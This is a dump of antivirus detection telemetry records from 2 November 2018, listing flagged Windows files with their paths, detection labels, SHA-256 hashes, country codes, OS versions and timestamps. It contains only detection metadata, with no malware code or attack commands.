  Row(detection=Row(filename='avscan-20181102-134258-8a4ec891', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134258-8A4EC891', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155845-99525dc7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a12a2d7b\\AVSCAN-20181102-150957-346F774B\\AVSCAN-20181102-155845-99525DC7', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:01:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afuwin.exe', filepath='E:\\Program Files\\ASUS\\AI Suite II\\ASUS Update\\Compal\\32\\afuwin.exe', filesize=336000, name='W32/Sality.AT.#M1.#R1'), hash='1b55afb78f6ef9b3a010aba4ffe52bb8ba2e4b4a198aa2537ddf40a47c4746d3', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:22:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104657-12cc5805', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_66ae5795\\AVSCAN-20181102-103738-DCC08D26\\AVSCAN-20181102-104657-12CC5805', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:46:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151610-b4ec7c9e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3ae15aaa\\AVSCAN-20181102-151239-915D24CF\\AVSCAN-20181102-151610-B4EC7C9E', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T20:16:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='csupdate.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\acad2014 32bits\\x86\\RC2014\\Program Files\\Autodesk\\Autodesk ReCap\\csupdate.exe', filesize=192000, name='W32/Stanit.#M1.#R1'), hash='1c5848b14bc8ebb210f05417a14347591e0dc3b600a10a1afa49ad049f05a020', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3e3315421731c5549874b9fca28e65ca66b309974bd50796ee9da6a19af20b4d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3E3315421731C5549874B9FCA28E65CA66B309974BD50796EE9DA6A19AF20B4D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3e3315421731c5549874b9fca28e65ca66b309974bd50796ee9da6a19af20b4d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:07:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='videodownloadconvert.856a56d2f9d74b499bc57785848a5890.exe', filepath='E:\\1 PASTA GERAL 2. 11 .2018\\VideoDownloadConvert.856a56d2f9d74b499bc57785848a5890.exe', filesize=368000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='1924b027eb4aaadfeaae0dafd66fbbb2e5a7a5c00bb8869d55d449ec8ad5c4e2', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T14:42:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135755-c42bc116', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b4ebaab\\AVSCAN-20181102-135608-BB7BBAB7\\AVSCAN-20181102-135755-C42BC116', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:58:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120427-0d5049da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120427-0D5049DA', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123551-52a67b7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cb62c39\\AVSCAN-20181102-123129-2C346BB9\\AVSCAN-20181102-123551-52A67B7D', filesize=512000, name='Worm/Delf.512553.#M1.#R1'), hash='7123b8bf12905ac0865284300759bc17d13c9f105fffd3b854dd901b43f040a1', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:35:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005245-881677eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7b6e3b0e\\AVSCAN-20181103-005213-82B287E6\\AVSCAN-20181103-005245-881677EB', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:56:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0004866.exe', filepath='\\\\?\\F:\\System Volume Information\\_restore{A693B33B-375F-4B55-9951-7D240E9CEC9D}\\RP13\\A0004866.exe', filesize=1088000, name='HEUR/AGEN.1008597.#M1.#R1'), hash='56b8c6da8d4a36df9e85c5ef74d6d02028d050ca8e8218376ca91a338354d191', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:41:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='images.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Cooler\\images\\images.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='51636ec1b5e4820e85f5edc9d934225779cba2d31f0cf9a99d78fa7e1cb953cb', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051933-da71446a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051933-DA71446A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141327-485101e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-141327-485101E8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016_dd18e016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016_dd18e016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T22:09:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001fa0', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001fa0', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:50:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T02:48:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kfpjilwd.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\kfpJilWD.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050711-2002a460', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050711-2002A460', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061310-58066012', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061310-58066012', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052221-3e45408f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052221-3E45408F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135718-94409f78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-135718-94409F78', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:00:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016 (1).exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016 (1).exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T11:17:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061454-95aacfa1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061454-95AACFA1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135613-88392a05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-135613-88392A05', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:59:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053224-a6055e52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053224-A6055E52', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060123-b2ad3730', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060123-B2AD3730', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120154-fcc3a1fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120154-FCC3A1FD', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.103\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.103\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T03:45:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052300-55e5f5d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052300-55E5F5D3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051632-6e387512', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051632-6E387512', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052114-16921755', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052114-16921755', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051842-bc0d53aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051842-BC0D53AA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054005-b8fdb16d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054005-B8FDB16D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:04Z'), dt=datetime.date(2018, 11, 2)),
